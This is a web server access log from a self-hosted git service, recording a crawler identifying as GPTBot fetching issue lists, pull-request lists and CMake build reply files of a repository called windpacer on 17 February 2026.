git.hanmocnn.co.kr "/windpacer/windpacer/pulls?project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 9978] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=recentupdate&state=open&type=all" -[17/Feb/2026:19:47:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10167] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastupdate&state=open&type=all" -[17/Feb/2026:19:47:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=nearduedate&state=open&type=all" -[17/Feb/2026:19:47:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10146] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:47:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10154] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=farduedate&state=all&type=all" -[17/Feb/2026:19:47:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9968] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=mostcomment&state=all&type=all" -[17/Feb/2026:19:47:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=rendered" [Client 74.7.227.38] [Length 11118] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:19:47:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json?display=source" [Client 74.7.227.38] [Length 14345] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" -[17/Feb/2026:19:47:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=source" [Client 74.7.227.38] [Length 14331] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:19:47:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=source" [Client 74.7.227.38] [Length 14310] [Gzip 5.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:19:47:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=rendered" [Client 74.7.227.38] [Length 11144] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:19:47:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json?display=rendered" [Client 74.7.227.38] [Length 11151] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" -[17/Feb/2026:19:47:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=rendered" [Client 74.7.227.38] [Length 11143] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:19:47:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json?display=source" [Client 74.7.227.38] [Length 14321] [Gzip 5.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" -[17/Feb/2026:19:47:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json?display=source" [Client 74.7.227.38] [Length 14347] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" -[17/Feb/2026:19:47:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json?display=rendered" [Client 74.7.227.38] [Length 11123] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" -[17/Feb/2026:19:47:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=source" [Client 74.7.227.38] [Length 14332] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:19:47:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10136] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=farduedate&state=all&type=all" -[17/Feb/2026:19:47:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10141] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastupdate&state=open&type=all" -[17/Feb/2026:19:47:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10149] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastcomment&state=all&type=all" -[17/Feb/2026:19:47:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9976] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=closed&type=all" -[17/Feb/2026:19:47:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 9966] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=recentupdate&state=open&type=all" -[17/Feb/2026:19:47:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 9968] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:47:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10137] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:47:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 9976] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=open&type=all" -[17/Feb/2026:19:47:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 9962] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:47:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9927] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:47:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10138] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=nearduedate&state=open&type=all" -[17/Feb/2026:19:47:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10148] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:47:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9951] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=mostcomment&state=all&type=all" -[17/Feb/2026:19:47:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:19:47:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:19:47:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:19:47:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=source" [Client 74.7.227.38] [Length 26376] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:19:47:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=source" [Client 74.7.227.38] [Length 26377] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:19:47:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=source" [Client 74.7.227.38] [Length 26379] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:19:47:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=source" [Client 74.7.227.38] [Length 26374] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:19:47:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:19:47:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=source" [Client 74.7.227.38] [Length 26378] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:19:47:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=source" [Client 74.7.227.38] [Length 26376] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:19:47:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=rendered" [Client 74.7.227.38] [Length 11154] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:19:47:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:19:47:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:19:47:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=rendered" [Client 74.7.227.38] [Length 11154] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:19:47:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:19:47:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:19:47:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=source" [Client 74.7.227.38] [Length 26376] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:19:47:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:19:47:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr 